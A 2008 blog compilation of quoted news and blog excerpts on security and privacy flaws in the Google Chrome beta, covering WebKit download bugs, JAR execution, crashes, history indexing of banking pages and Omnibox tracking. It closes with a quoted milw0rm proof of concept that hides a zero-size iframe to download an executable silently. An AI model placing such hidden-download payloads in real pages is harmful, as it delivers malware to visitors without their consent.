Google Chrome Security and Privacy Risks
Tomi Häsä
September 3, 2008
"Barely a day after Google's new browser was released, Chrome is showing
some scratches: researchers have pointed out known security
vulnerabilities that can put users at risk of malicious exploits."
"The Chrome security flaws identified this afternoon include known WebKit
(the open source engine the browser is constructed around) vulnerabilities
that, combined with a Java bug, can result in downloads of executable
malicious files."
"Other security researchers note there are ways to crash Chrome via
malicious links, possibly without user input."
"Early days for Chrome yet, and very early for the risk assessments and
vulnerability audits to be anywhere near complete: we'll all be hearing
plenty more about these -- and, one hopes, patches and fixes for them --
in the next few days."
"For now it's worth reminding yourself and your employees that Chrome is
still in beta, a work in progress that, for all of its promise, and
especially all of its buzz, should be used carefully (if at all) in the
small and midsize business workplace."
"Your call of course, but it's a call you should make, one way or another,
before those tech-happy members of your non-IT staff get too many copies
of Chrome, with its now-known vulnerabilities, running on too many of your
company's systems."
http://www.bmighty.com/blog/main/archives/2008/09/chrome_security.html
Google's Chrome Browser Not Yet Secure
September 3, 2008
"Google's Chrome browser is only a day old, but security researchers
already have found vulnerabilities that can be exploited."
"According to a report published by ZDNet, security researcher Aviv Raff
has found that he can combine a flaw in the open source WebKit engine with
a Java bug to dupe Chrome users into downloading executable files."
"Apple, which uses WebKit in its Safari browser, fixed this flaw with its
Safari 3.1.2 browser patch. Chrome uses an older version of WebKit that
has not been repaired."
"Another security researcher, Rishi Narang, claimed to have found a way to
crash Chrome with a malicious link."
""An issue exists in how chrome behaves with undefined-handlers in
chrome.dll version 0.2.149.27," Narang explained on the Evil Fingers Web
site. "A crash can result without user interaction. When a user is made to
visit a malicious link, which has an undefined handler followed by a
'special' character, the Chrome crashes with a Google Chrome message
window 'Whoa! Google Chrome has crashed. Restart now?'""
"And someone identified as "Nerex" has posted proof-of-concept JavaScript
code on Milw0rm.com that supposedly "allows files (e.g., executables) to
be automatically downloaded to the user's computer without any user
prompt.""
"This exploit appears to be similar to the one identified by Raff."
"In theory, Google Chrome should be more secure than other browsers
because, rather than being a single-threaded application, each tab is
handled by its own sandboxed process with its own memory space. Like a
multiengine plane, Chrome is designed not to crash following the loss of a
single engine."
""[Chrome] utilizes technology that has historically been associated with
operating systems to create isolation between different browser tabs with
the aim of improved crash-resistance and security," IDC analyst Al Hilwa
said in a research note. "The security capabilities also ensue from a new
sandbox model that strengthens what is typically available today from
other browsers.""
"But Chrome is beta software and remains a work in progress."
"Hilwa observes that while Google's security architecture isolates the
browser's kernel from attacks on rendering-engine vulnerabilities, it
doesn't extend this same protection to plug-ins like Java, Flash, and
Silverlight."
"Mozilla software engineer Robert O'Callahan in a blog post said that
while Chrome looks promising, Google's coders still have challenges to
overcome. "There are some interesting architectural problems they haven't
solved yet, especially with the process separation model, especially with
regard to windowless plugins, and also Mac," he said. "These are problems
that will be encountered by anyone doing process separation so it will be
interesting to see how that goes.""
http://www.informationweek.com/news/internet/google/showArticle.jhtml;jsessionid=BGWZLKEWFDCRKQSNDLPSKH0CJUNN2JVN?articleID=210300297
Google Chrome vulnerable to carpet-bombing flaw
September 2, 2008
"Google's shiny new Web browser is vulnerable to a carpet-bombing
vulnerability that could expose Windows users to malicious hacker
attacks."
"Just hours after the release of Google Chrome, researcher Aviv Raff
discovered that he could combine two vulnerabilities - a flaw in Apple
Safari (WebKit) and a Java bug discussed at this year's Black Hat
conference - to trick users into launching executables direct from the new
browser."
"Raff has cooked up a harmless demo of the attack in action, showing how a
Google Chrome users can be lured into downloading and launching a JAR
(Java Archive) file that gets executed without warning."
"In the proof-of-concept, Raff's code shows how a malicious hacker can use
a clever social engineering lure - it requires two mouse clicks - to plant
malware on Windows desktops."
"The Google Chrome user-agent shows that Chrome is actually WebKit 525.13
(Safari 3.1), which is an outdated/vulnerable version of that browser."
"Apple patched the carpet-bombing issue with Safari v3.1.2."
"Some Google Chrome early adopters using Windows Vista are reporting that
files downloaded from the Internet are automatically dropped on the
desktop, setting up a scenario where a combo-attack using this unpatched
IE flaw could be used in attacks."
http://blogs.zdnet.com/security/?p=1843
Google Mule
September 3, 2008
"In real life, when you take two species, a horse and a donkey, and mix
them up you get a mule. In the browsers world, when you take a horse
(Firefox/IE) and a donkey (Safari) and mix them up, you get - Google
Chrome."
"The new browser from Google tries to get the best from other browsers,
but instead (well, at least in the current beta version), it seems to be
doing quite the opposite."
"The current beta uses an old version of WebKit - 525.13 - which is
actually the same WebKit engine used by the old Safari v3.1. The current
Safari version is v3.1.2, which fixed several critical issues, including
the "blended threat" Carpet Bombing vulnerability. Google even mention
that they use Safari v3.1 rendering engine in their own documentation
(Thanks Yonatan Grabber for the information!)"
"On the other hand, Chrome borrowed (and modified) local resource files
from the Mozilla project. And also, for some reason, in some cases there
is an ActiveX plug-in loaded by Chrome, which might be an evidence of a
capability of this browser to execute ActiveX controls."
"I really wonder why Google have taken several features from other
browsers and mixed them all together. Security wise, it's very
problematic."
"They'll have to track all security vulnerabilities in those features, and
fix them in Chrome too. This will probably be only after those
vulnerabilities were fixed by the other vendors or were publicly reported.
It will put Chrome users at risk for a long time."
"Back to the WebKit issue. I've created a proof-of-concept which
demonstrates the automatic download vulnerability that was already fixed
by Apple. This PoC will automatically download a JAR file and place it in
the the downloads folder (there are reports that in some cases it will
download it to the Desktop, as in Safari. In those cases, the
Safari-Pwns-IE exploit can be easily converted to Chrome-Pwns-IE
exploit)."
"Unfortunately, whenever Google Chrome downloads a file, it creates a
download bar at the bottom of the page, which seems, for the untrained
eye, as part of the page. The downloaded filename is displayed as a
button, and the one click on this button will execute the file. If the
file is an executable (e.g. .EXE, .BAT, etc.), Windows Explorer will show
a warning that this file was downloaded from the Internet. In this case,
Google Chrome does a good job by setting the Zone.Identifier in the
alternative data stream."
"However, as was mentioned by pdp at his great Black Hat talk this August,
when Windows Explorer will try to execute a JAR file, it will
automatically run the associated application, which in most cases is the
JRE (Java Runtime Environment). JRE will not check the Zone.Identifier in
the alternative data stream, and will execute the JAR file with no
warning. JAR file, of-course, should be treated as any other executable
file. This is again a sort of a "blended threat". Two small issues in
different products, when blended together create a much larger problem."
"In conclusion, Chrome seems to be a very nice and slick browser, but it
is far from being secured as it is advertised by Google. It borrows
several insecure features from other browsers, and it has its own security
design flaws."
http://aviv.raffon.net/2008/09/03/GoogleMule.aspx
Chrome
September 3, 2008
"A few people I know have asked me what I think about Google's Chrome
browser."
"Technically, it looks good on paper. There are some interesting
architectural problems they haven't solved yet, especially with the
process separation model, especially with regard to windowless plugins,
and also Mac. These are problems that will be encountered by anyone doing
process separation so it will be interesting to see how that goes. V8
seems overhyped when you take into account the JS work being done by other
browser vendors."
"I'm not sure how the competitive landscape is going to play out.
Mozilla's in a strong position now and the immediate future looks great.
We just need to stay focused, keep making smart decisions, and keep
shipping great software."
"Overall, I'm actually really excited. No matter who gains and who loses,
there's no doubt that this innovation and investment and energy is great
for the Web (especially when it's delivered in free software)."
http://weblogs.mozillazine.org/roc/archives/2008/09/chrome.html
Google Chrome privacy issues, and user tips
September 4, 2008
"TH Daily has an interesting story, Chrome is a security nightmare. It
turns out that Chrome indexes and stores your bank account and other
personal financial information even on secure (https://) pages, though
whether it's actually a "security nightmare" is another issue."
"Do the stuff you would normally do like look at your balances and gawk at
your latest transactions and then open up a new tab in Chrome by clicking
the "+" symbol. In the right-hand history search box, enter a few keywords
and see what they get you. Surprised? I bet you are."
"The history search feature means you can find all your financial, medical
and other secrets from the browser without going anywhere near the secure
site. Or someone else can. If you have a PC where someone else can access
it -- for example, in almost any office -- then it's a recipe for
disaster. Since you'll never remember to always use the "porn mode"
(InCognito), then the best answer may be to stay well away from anything
password protected and personal."
"The Electronic Frontier Foundation has a different concern. It says,
according to CNet's headline, We're concerned about Google's Omnibox.
There's a privacy issue because anything you type in gets sent back to the
Google mothership, and it's storing some of it. The ways to avoid that
include (1) turn off auto-suggest; or (2) use a default search engine that
isn't Google; or (3) use porn mode. Any one will do."
"Still, EFF staff technologist Peter Eckersley says: "We are genuinely
really worried about the Omnibox thing. It's just one more piece of the
complete puzzle of Google seeing everything that everyone is doing.""
"Simon Davies, Founder of Privacy International and a senior fellow with
the Electronic Privacy Information Center (EPIC) also expressed concern
over the Omnibox feature."
""I'm astonished that these terms are sent to Google even without the
return being hit," Davies said. "That is beyond anything that Google has
ever contemplated before.""
"Hmm, well, if Google has already stored every search you've made there,
and it has all your email, and your calendar, and your docs, and your
photos, and it knows where you are going and when and why, it may be a bit
late to complain about things like that....."
"Runs faster, crashes faster: Sorry, I forgot to include the (mercifully
short) story of the day: you can crash Chrome by typing :% in the address
bar. I expect someone will figure out how to crash it remotely, if they
haven't already done so...."
http://blogs.guardian.co.uk/technology/2008/09/04/google_chrome_privacy_issues_and_user_tips.html
Chrome is a security nightmare, indexes your bank accounts
September 4, 2008
"Can a browser's search function work too well? After playing around with
Google's brand new Chrome browser, we've discovered that its history
search box will fetch all types of data - even text from HTTPS-protected
financial sites like Washington Mutual and Capital One. With a few
utterly simple keywords like balance, account and Sept., everything from
balance information, account numbers and even how much you spent at Costco
can be pulled up."
"To see all of this in action, just open up Chrome and log in to your
favorite financial website. Like most important sites, it should be
protected with HTTPS/SSL encryption and that should be evident in the
address bar of the browser. Do the stuff you would normally do like look
at your balances and gawk at your latest transactions and then open up a
new tab in Chrome by clicking the "+" symbol. In the right-hand history
search box, enter a few keywords and see what they get you. Surprised? I
bet you are. No luck? Then try something simple like oh Visa,
Mastercard, balance and account. Also try out the names and abbreviations
of months like September, Sept and Sep."
"If you're like me, you probably saw account balances and some transaction
details, but if you further refine your keywords you'd be able to see a
lot more. We first discovered this "problem" by browsing the
forensicfocus.com forums. "Problem" is in quotes because we're not sure
if this is a true vulnerability or Google Chrome's search function working
as intended - in this case, just too damn good. While playing around with
the forensic implications of Chrome, "Jelle" on the forums posted that he
and his partner noticed the browser was indexing information from HTTPS
sites."
""One interesting finding is that in the regular browsing mode, Chrome
creates a search index of the contents of a lot of the pages you visit.
This allows you to do keyword searching in your own web history. On some
of our tests, we found that content of https pages had been indexed as
well, allowing us to retrieve our bank account details using a keyword
search," Jelle posted."
"Is there a way to protect your financial information from being indexed?
Google Chrome does have an incognito mode that promises to not cache
anything. This can be accessed from the file menu in the upper-right
corner of the window or by using the keyboard shortcut (Control Shift N).
You can also clear your browser data after surfing to a financial website
by going to the tools menu that's also in the upper-right corner."
"It was just yesterday that I wrote about Chrome's security as being "not
bad", but I personally don't get a warm and fuzzy feeling if Chrome is
indexing all of my financial information. Search and indexing is what
Google is good at and the company has made my life a whole lot easier in
many ways, but indexing financial info is crossing the line."
"On the programming level, I can't really blame Google's developers though
because HTTPS was never meant to provide any protection anyways on the
desktop itself. The protection was developed to protect traffic as it
travelled through the "Wild West" Internet. But while this distinction is
clear to most of our readers - the regular person probably believes
HTTPS/SSL traffic is and should be protected on the desktop."
"So is this all a big deal? Well anyone who wants to search your
financial information would need local access to your machine and if a
person is sitting at your computer, you have a lot more things to worry
about than him/her using Chrome's history search. Conceivably a hacker
could develop an app to pull the cache and index files off your computer
and examine them later on another machine - these files reside in the
"C:\Documents and Settings\USERNAME\Local Settings\Application
Data\Google\Chrome\User Data\Default" folder."
"But on a simpler level, if ALL of the sites I visit are being keyworded
and indexed locally, then how do I know that this information will stay
local. I guess that depends on how much you trust Google."
http://www.tgdaily.com/content/view/39176/108/
EFF: We're concerned about Google's Omnibox
September 3, 2008
"Privacy advocates are starting to sound the alarm over a feature in
Google's Chrome that sends anything typed in the browser's Omnibox back to
Google."
"Google told CNET News earlier Wednesday that it plans to store about 2
percent of the data it gets back, along with the IP address of the
computer that sent it. Google said it won't receive or store data if users
turn off the auto-suggest feature or if they select a default search
provider other than Google or if they are using the product's "Incognito"
mode."
"Still, EFF staff technologist Peter Eckersley said in an interview that
he is concerned about Google having yet another window into what the world
is browsing."
""We're worried that Chrome will be another giant conveyer belt moving
private information about our use of the Web into Google's data vaults,"
Eckersley said. "Google already knows far too much about what everybody is
thinking at any given moment."
""The addition of Incognito is great," he said, adding that Google is
making some strides with Chrome, clearly recognizing that people want to
be able to surf the Web without having a record of it stored in various
places."
""We are genuinely really worried about the Omnibox thing," he said. "It's
just one more piece of the complete puzzle of Google seeing everything
that everyone is doing.""
http://news.cnet.com/8301-13860_3-10032047-56.html
Google admits Chrome tracks web addresses
September 4, 2008
"Google has admitted the auto-suggest feature of Chrome's Omnibox gives it
potential access to users' keystrokes, providing the company with a wealth
of information on the browsing habits of its users."
""When you type URLs or queries in the address bar, the letters you type
are sent to Google so the Suggest feature can automatically recommend
terms or URLs you may be looking for," the company notes in its privacy
policy."
""If you choose to share usage statistics with Google and you accept a
suggested query or URL, Google Chrome will send that information to Google
as well. You can disable this feature.""
"Unlike searching through Google, so long as the user has auto-suggest
enabled, and Google set as their default search engine, the Omnibox will
grant Google access to search enquiries without the user ever hitting the
enter key."
"Google says it intends to store about 2% of this information, alongside
the IP address of the computer that typed it."
"Given that current figures reveal Chrome has already grabbed 1% of the
browser market, this could represent a huge amount of information."
http://www.pcpro.co.uk/news/222834/google-admits-chrome-tracks-web-addresses.html
Google Chrome Browser 0.2.149.27
"Software:"
"Google Chrome Browser 0.2.149.27"
"Tested:"
"Windows XP Professional SP3"
"Result:"
"Google Chrome Crashes with All Tabs"
"Problem:"
"An issue exists in how chrome behaves with undefined-handlers in
chrome.dll version 0.2.149.27. A crash can result without user
interaction. When a user is made to visit a malicious link, which has an
undefined handler followed by a 'special' character, the chrome crashes
with a Google Chrome message window "Whoa! Google Chrome has crashed.
Restart now?". It crashes on "int 3" at 0x01002FF3 as an exception/trap,
followed by "POP EBP" instruction when pointed out by the EIP register at
0x01002FF4."
http://evilfingers.com/advisory/google_chrome_poc.php
Author: nerex
"E-mail: nerex[at]live[dot]com"
"Google's new Web browser (Chrome) allows files (e.g., executables) to be
automatically downloaded to the user's computer without any user prompt."
"This proof-of-concept was created for educational purposes only."
"Use the code it at your own risk."
"The author will not be responsible for any damages."
"Tested on Windows Vista SP1 and Windows XP SP3 with Google Chrome (BETA)"
"<script>"
"document.write('<iframe src="http://www.example.com/hello.exe"
frameborder="0" width="0" height="0">');"
"</script>"
"# milw0rm.com [2008-09-03]"
http://www.milw0rm.com/exploits/6355